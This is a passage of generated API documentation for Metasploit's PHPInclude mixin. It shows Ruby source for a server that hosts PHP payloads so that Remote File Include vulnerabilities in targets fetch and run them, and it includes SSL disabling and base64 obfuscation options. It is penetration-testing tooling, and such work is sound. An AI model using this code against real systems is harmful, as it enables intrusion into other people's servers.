adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/HttpServer/PHPInclude.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

682 lines
40 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::HttpServer::PHPInclude
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::HttpServer::PHPInclude";
relpath = '../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../_index.html">Index (P)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../HttpServer.html" title="Msf::Exploit::Remote::HttpServer (module)">HttpServer</a></span></span>
&raquo;
<span class="title">PHPInclude</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::HttpServer::PHPInclude
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../HttpServer.html" title="Msf::Exploit::Remote::HttpServer (module)">Msf::Exploit::Remote::HttpServer</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/http_server/php_include.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>This module provides methods for exploiting PHP scripts by acting as an HTTP server hosting the payload for Remote File Include vulnerabilities.</p>
</div>
</div>
<div class="tags">
</div>
<h2>Instance Attribute Summary</h2>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="../SocketServer.html" title="Msf::Exploit::Remote::SocketServer (module)">SocketServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../SocketServer.html#service-instance_method" title="Msf::Exploit::Remote::SocketServer#service (method)">#service</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#autofilter-instance_method" title="#autofilter (instance method)">#<strong>autofilter</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Since these types of vulns are Stance::Aggressive, override HttpServers normal non-automatic behaviour and allow things to run us automatically.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#exploit-instance_method" title="#exploit (instance method)">#<strong>exploit</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>:category: Exploit::Remote::TcpServer overrides.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#on_request_uri-instance_method" title="#on_request_uri (instance method)">#<strong>on_request_uri</strong>(cli, request, headers = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>:category: Event Handlers.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#php_include_url-instance_method" title="#php_include_url (instance method)">#<strong>php_include_url</strong>(sock = nil) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>The PHP include URL (pre-encoded).</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#send_php_payload-instance_method" title="#send_php_payload (instance method)">#<strong>send_php_payload</strong>(cli, body, headers = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Transmits a PHP payload to the web application.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../HttpServer.html" title="Msf::Exploit::Remote::HttpServer (module)">Msf::Exploit::Remote::HttpServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../HttpServer.html#add_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#add_resource (method)">#add_resource</a></span>, <span class='object_link'><a href="../HttpServer.html#add_robots_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#add_robots_resource (method)">#add_robots_resource</a></span>, <span class='object_link'><a href="../HttpServer.html#check_dependencies-instance_method" title="Msf::Exploit::Remote::HttpServer#check_dependencies (method)">#check_dependencies</a></span>, <span class='object_link'><a href="../HttpServer.html#cleanup-instance_method" title="Msf::Exploit::Remote::HttpServer#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="../HttpServer.html#cli-instance_method" title="Msf::Exploit::Remote::HttpServer#cli (method)">#cli</a></span>, <span class='object_link'><a href="../HttpServer.html#cli=-instance_method" title="Msf::Exploit::Remote::HttpServer#cli= (method)">#cli=</a></span>, <span class='object_link'><a href="../HttpServer.html#close_client-instance_method" title="Msf::Exploit::Remote::HttpServer#close_client (method)">#close_client</a></span>, <span class='object_link'><a href="../HttpServer.html#create_response-instance_method" title="Msf::Exploit::Remote::HttpServer#create_response (method)">#create_response</a></span>, <span class='object_link'><a href="../HttpServer.html#fingerprint_user_agent-instance_method" title="Msf::Exploit::Remote::HttpServer#fingerprint_user_agent (method)">#fingerprint_user_agent</a></span>, <span class='object_link'><a href="../HttpServer.html#get_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#get_resource (method)">#get_resource</a></span>, <span class='object_link'><a href="../HttpServer.html#get_uri-instance_method" title="Msf::Exploit::Remote::HttpServer#get_uri (method)">#get_uri</a></span>, <span class='object_link'><a href="../HttpServer.html#hardcoded_uripath-instance_method" title="Msf::Exploit::Remote::HttpServer#hardcoded_uripath (method)">#hardcoded_uripath</a></span>, <span class='object_link'><a href="../HttpServer.html#print_prefix-instance_method" title="Msf::Exploit::Remote::HttpServer#print_prefix (method)">#print_prefix</a></span>, <span class='object_link'><a href="../HttpServer.html#random_uri-instance_method" title="Msf::Exploit::Remote::HttpServer#random_uri (method)">#random_uri</a></span>, <span class='object_link'><a href="../HttpServer.html#regenerate_payload-instance_method" title="Msf::Exploit::Remote::HttpServer#regenerate_payload (method)">#regenerate_payload</a></span>, <span class='object_link'><a href="../HttpServer.html#remove_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#remove_resource (method)">#remove_resource</a></span>, <span class='object_link'><a href="../HttpServer.html#report_user_agent-instance_method" title="Msf::Exploit::Remote::HttpServer#report_user_agent (method)">#report_user_agent</a></span>, <span class='object_link'><a href="../HttpServer.html#resource_uri-instance_method" title="Msf::Exploit::Remote::HttpServer#resource_uri (method)">#resource_uri</a></span>, <span class='object_link'><a href="../HttpServer.html#send_local_redirect-instance_method" title="Msf::Exploit::Remote::HttpServer#send_local_redirect (method)">#send_local_redirect</a></span>, <span class='object_link'><a href="../HttpServer.html#send_not_found-instance_method" title="Msf::Exploit::Remote::HttpServer#send_not_found (method)">#send_not_found</a></span>, <span class='object_link'><a href="../HttpServer.html#send_redirect-instance_method" title="Msf::Exploit::Remote::HttpServer#send_redirect (method)">#send_redirect</a></span>, <span class='object_link'><a href="../HttpServer.html#send_response-instance_method" title="Msf::Exploit::Remote::HttpServer#send_response (method)">#send_response</a></span>, <span class='object_link'><a href="../HttpServer.html#send_robots-instance_method" title="Msf::Exploit::Remote::HttpServer#send_robots (method)">#send_robots</a></span>, <span class='object_link'><a href="../HttpServer.html#srvhost_addr-instance_method" title="Msf::Exploit::Remote::HttpServer#srvhost_addr (method)">#srvhost_addr</a></span>, <span class='object_link'><a href="../HttpServer.html#srvport-instance_method" title="Msf::Exploit::Remote::HttpServer#srvport (method)">#srvport</a></span>, <span class='object_link'><a href="../HttpServer.html#start_service-instance_method" title="Msf::Exploit::Remote::HttpServer#start_service (method)">#start_service</a></span>, <span class='object_link'><a href="../HttpServer.html#use_zlib-instance_method" title="Msf::Exploit::Remote::HttpServer#use_zlib (method)">#use_zlib</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Auxiliary/Report.html" title="Msf::Auxiliary::Report (module)">Auxiliary::Report</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Auxiliary/Report.html#active_db%3F-instance_method" title="Msf::Auxiliary::Report#active_db? (method)">#active_db?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_cracked_credential-instance_method" title="Msf::Auxiliary::Report#create_cracked_credential (method)">#create_cracked_credential</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential-instance_method" title="Msf::Auxiliary::Report#create_credential (method)">#create_credential</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential_and_login-instance_method" title="Msf::Auxiliary::Report#create_credential_and_login (method)">#create_credential_and_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential_login-instance_method" title="Msf::Auxiliary::Report#create_credential_login (method)">#create_credential_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#db-instance_method" title="Msf::Auxiliary::Report#db (method)">#db</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#db_warning_given%3F-instance_method" title="Msf::Auxiliary::Report#db_warning_given? (method)">#db_warning_given?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#get_client-instance_method" title="Msf::Auxiliary::Report#get_client (method)">#get_client</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#get_host-instance_method" title="Msf::Auxiliary::Report#get_host (method)">#get_host</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#inside_workspace_boundary%3F-instance_method" title="Msf::Auxiliary::Report#inside_workspace_boundary? (method)">#inside_workspace_boundary?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#invalidate_login-instance_method" title="Msf::Auxiliary::Report#invalidate_login (method)">#invalidate_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#mytask-instance_method" title="Msf::Auxiliary::Report#mytask (method)">#mytask</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#myworkspace-instance_method" title="Msf::Auxiliary::Report#myworkspace (method)">#myworkspace</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#myworkspace_id-instance_method" title="Msf::Auxiliary::Report#myworkspace_id (method)">#myworkspace_id</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_auth_info-instance_method" title="Msf::Auxiliary::Report#report_auth_info (method)">#report_auth_info</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_client-instance_method" title="Msf::Auxiliary::Report#report_client (method)">#report_client</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_exploit-instance_method" title="Msf::Auxiliary::Report#report_exploit (method)">#report_exploit</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_host-instance_method" title="Msf::Auxiliary::Report#report_host (method)">#report_host</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_loot-instance_method" title="Msf::Auxiliary::Report#report_loot (method)">#report_loot</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_note-instance_method" title="Msf::Auxiliary::Report#report_note (method)">#report_note</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_service-instance_method" title="Msf::Auxiliary::Report#report_service (method)">#report_service</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_vuln-instance_method" title="Msf::Auxiliary::Report#report_vuln (method)">#report_vuln</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_web_form-instance_method" title="Msf::Auxiliary::Report#report_web_form (method)">#report_web_form</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_web_page-instance_method" title="Msf::Auxiliary::Report#report_web_page (method)">#report_web_page</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_web_site-instance_method" title="Msf::Auxiliary::Report#report_web_site (method)">#report_web_site</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_web_vuln-instance_method" title="Msf::Auxiliary::Report#report_web_vuln (method)">#report_web_vuln</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#store_cred-instance_method" title="Msf::Auxiliary::Report#store_cred (method)">#store_cred</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#store_local-instance_method" title="Msf::Auxiliary::Report#store_local (method)">#store_local</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#store_loot-instance_method" title="Msf::Auxiliary::Report#store_loot (method)">#store_loot</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html" title="Metasploit::Framework::Require (module)">Metasploit::Framework::Require</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally-class_method" title="Metasploit::Framework::Require.optionally (method)">optionally</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_active_record_railtie-class_method" title="Metasploit::Framework::Require.optionally_active_record_railtie (method)">optionally_active_record_railtie</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-class_method" title="Metasploit::Framework::Require.optionally_include_metasploit_credential_creation (method)">optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-instance_method" title="Metasploit::Framework::Require#optionally_include_metasploit_credential_creation (method)">#optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_require_metasploit_db_gem_engines-class_method" title="Metasploit::Framework::Require.optionally_require_metasploit_db_gem_engines (method)">optionally_require_metasploit_db_gem_engines</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../TcpServer.html" title="Msf::Exploit::Remote::TcpServer (module)">TcpServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../TcpServer.html#on_client_close-instance_method" title="Msf::Exploit::Remote::TcpServer#on_client_close (method)">#on_client_close</a></span>, <span class='object_link'><a href="../TcpServer.html#on_client_connect-instance_method" title="Msf::Exploit::Remote::TcpServer#on_client_connect (method)">#on_client_connect</a></span>, <span class='object_link'><a href="../TcpServer.html#ssl-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl (method)">#ssl</a></span>, <span class='object_link'><a href="../TcpServer.html#ssl_cert-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_cert (method)">#ssl_cert</a></span>, <span class='object_link'><a href="../TcpServer.html#ssl_cipher-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_cipher (method)">#ssl_cipher</a></span>, <span class='object_link'><a href="../TcpServer.html#ssl_compression-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_compression (method)">#ssl_compression</a></span>, <span class='object_link'><a href="../TcpServer.html#ssl_version-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_version (method)">#ssl_version</a></span>, <span class='object_link'><a href="../TcpServer.html#start_service-instance_method" title="Msf::Exploit::Remote::TcpServer#start_service (method)">#start_service</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../SocketServer.html" title="Msf::Exploit::Remote::SocketServer (module)">SocketServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../SocketServer.html#_determine_server_comm-instance_method" title="Msf::Exploit::Remote::SocketServer#_determine_server_comm (method)">#_determine_server_comm</a></span>, <span class='object_link'><a href="../SocketServer.html#bindhost-instance_method" title="Msf::Exploit::Remote::SocketServer#bindhost (method)">#bindhost</a></span>, <span class='object_link'><a href="../SocketServer.html#bindport-instance_method" title="Msf::Exploit::Remote::SocketServer#bindport (method)">#bindport</a></span>, <span class='object_link'><a href="../SocketServer.html#cleanup-instance_method" title="Msf::Exploit::Remote::SocketServer#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="../SocketServer.html#cleanup_service-instance_method" title="Msf::Exploit::Remote::SocketServer#cleanup_service (method)">#cleanup_service</a></span>, <span class='object_link'><a href="../SocketServer.html#on_client_data-instance_method" title="Msf::Exploit::Remote::SocketServer#on_client_data (method)">#on_client_data</a></span>, <span class='object_link'><a href="../SocketServer.html#primer-instance_method" title="Msf::Exploit::Remote::SocketServer#primer (method)">#primer</a></span>, <span class='object_link'><a href="../SocketServer.html#regenerate_payload-instance_method" title="Msf::Exploit::Remote::SocketServer#regenerate_payload (method)">#regenerate_payload</a></span>, <span class='object_link'><a href="../SocketServer.html#srvhost-instance_method" title="Msf::Exploit::Remote::SocketServer#srvhost (method)">#srvhost</a></span>, <span class='object_link'><a href="../SocketServer.html#srvhost_addr-instance_method" title="Msf::Exploit::Remote::SocketServer#srvhost_addr (method)">#srvhost_addr</a></span>, <span class='object_link'><a href="../SocketServer.html#srvport-instance_method" title="Msf::Exploit::Remote::SocketServer#srvport (method)">#srvport</a></span>, <span class='object_link'><a href="../SocketServer.html#start_service-instance_method" title="Msf::Exploit::Remote::SocketServer#start_service (method)">#start_service</a></span>, <span class='object_link'><a href="../SocketServer.html#via_string-instance_method" title="Msf::Exploit::Remote::SocketServer#via_string (method)">#via_string</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="autofilter-instance_method">
#<strong>autofilter</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Since these types of vulns are Stance::Aggressive, override HttpServers normal non-automatic behaviour and allow things to run us automatically</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
28
29
30</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 28</span>
<span class='kw'>def</span> <span class='id identifier rubyid_autofilter'>autofilter</span>
<span class='kw'>true</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="exploit-instance_method">
#<strong>exploit</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>:category: Exploit::Remote::TcpServer overrides</p>
<p>Override exploit() to handle service start/stop</p>
<p>Disables SSL for the service since we always want to serve our evil PHP files from a non-ssl server. There are two reasons for this:</p>
<ol><li>
<p>https is only supported on PHP versions after 4.3.0 and only if the OpenSSL extension is compiled in, a non-default configuration on most systems</p>
</li><li>
<p>somewhat less importantly, the SSL option would conflict with the option for our client connecting to the vulnerable server</p>
</li></ol>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 45</span>
<span class='kw'>def</span> <span class='id identifier rubyid_exploit'>exploit</span>
<span class='id identifier rubyid_old_ssl'>old_ssl</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>SSL</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>SSL</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>false</span>
<span class='id identifier rubyid_start_service'>start_service</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>SSL</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_old_ssl'>old_ssl</span>
<span class='comment'>#if (datastore[&quot;SRVHOST&quot;] == &quot;0.0.0.0&quot; and Rex::Socket.is_internal?(srvhost_addr))
</span> <span class='comment'># print_error(&quot;Warning: the URL used for the include might be wrong!&quot;)
</span> <span class='comment'># print_error(&quot;If the target system can route to #{srvhost_addr} it&quot;)
</span> <span class='comment'># print_error(&quot;is safe to ignore this warning. If not, try using a&quot;)
</span> <span class='comment'># print_error(&quot;reverse payload instead of bind.&quot;)
</span> <span class='comment'>#end
</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>PHP include server started.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='semicolon'>;</span>
<span class='id identifier rubyid_php_exploit'>php_exploit</span>
<span class='op'>::</span><span class='const'>IO</span><span class='period'>.</span><span class='id identifier rubyid_select'>select</span><span class='lparen'>(</span><span class='kw'>nil</span><span class='comma'>,</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='int'>5</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
14
15
16
17
18
19
20
21
22
23
24</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 14</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='comment'># Override TCPServer&#39;s stance of passive
</span> <span class='kw'>super</span><span class='lparen'>(</span><span class='id identifier rubyid_update_info'>update_info</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Stance</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Stance.html" title="Msf::Exploit::Stance (module)">Stance</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Stance.html#Aggressive-constant" title="Msf::Exploit::Stance::Aggressive (constant)">Aggressive</a></span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_evasion_options'>register_evasion_options</span><span class='lparen'>(</span>
<span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../../OptEnum.html" title="Msf::OptEnum (class)">OptEnum</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../OptEnum.html#initialize-instance_method" title="Msf::OptEnum#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PHP::Encode</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Enable PHP code obfuscation</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>none</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>none</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>base64</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../HttpServer.html" title="Msf::Exploit::Remote::HttpServer (module)">HttpServer</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="" title="Msf::Exploit::Remote::HttpServer::PHPInclude (module)">PHPInclude</a></span></span>
<span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="on_request_uri-instance_method">
#<strong>on_request_uri</strong>(cli, request, headers = {}) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>:category: Event Handlers</p>
<p>Handle an incoming PHP code request</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
83
84
85
86
87
88
89</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 83</span>
<span class='kw'>def</span> <span class='id identifier rubyid_on_request_uri'>on_request_uri</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='comma'>,</span> <span class='id identifier rubyid_headers'>headers</span><span class='op'>=</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='comment'># Re-generate the payload
</span> <span class='kw'>return</span> <span class='kw'>if</span> <span class='lparen'>(</span><span class='lparen'>(</span><span class='id identifier rubyid_p'>p</span> <span class='op'>=</span> <span class='id identifier rubyid_regenerate_payload'>regenerate_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span><span class='rparen'>)</span> <span class='op'>==</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='comment'># Send it to the application
</span> <span class='id identifier rubyid_send_php_payload'>send_php_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_p'>p</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span><span class='comma'>,</span> <span class='id identifier rubyid_headers'>headers</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="php_include_url-instance_method">
#<strong>php_include_url</strong>(sock = nil) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>The PHP include URL (pre-encoded)</p>
<p>Does not take SSL into account. For the reasoning behind this, see <span class='object_link'><a href="#exploit-instance_method" title="Msf::Exploit::Remote::HttpServer::PHPInclude#exploit (method)">#exploit</a></span>.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The URL to be used as the argument in a call to <code>require</code>, <code>require_once</code>, or <code>include</code> or <code>include_once</code> in a vulnerable PHP app.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
100
101
102
103
104
105
106</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 100</span>
<span class='kw'>def</span> <span class='id identifier rubyid_php_include_url'>php_include_url</span><span class='lparen'>(</span><span class='id identifier rubyid_sock'>sock</span><span class='op'>=</span><span class='kw'>nil</span><span class='rparen'>)</span>
<span class='id identifier rubyid_host'>host</span> <span class='op'>=</span> <span class='id identifier rubyid_srvhost_addr'>srvhost_addr</span>
<span class='kw'>if</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Socket</span><span class='period'>.</span><span class='id identifier rubyid_is_ipv6?'>is_ipv6?</span><span class='lparen'>(</span><span class='id identifier rubyid_host'>host</span><span class='rparen'>)</span>
<span class='id identifier rubyid_host'>host</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_host'>host</span><span class='embexpr_end'>}</span><span class='tstring_content'>]</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
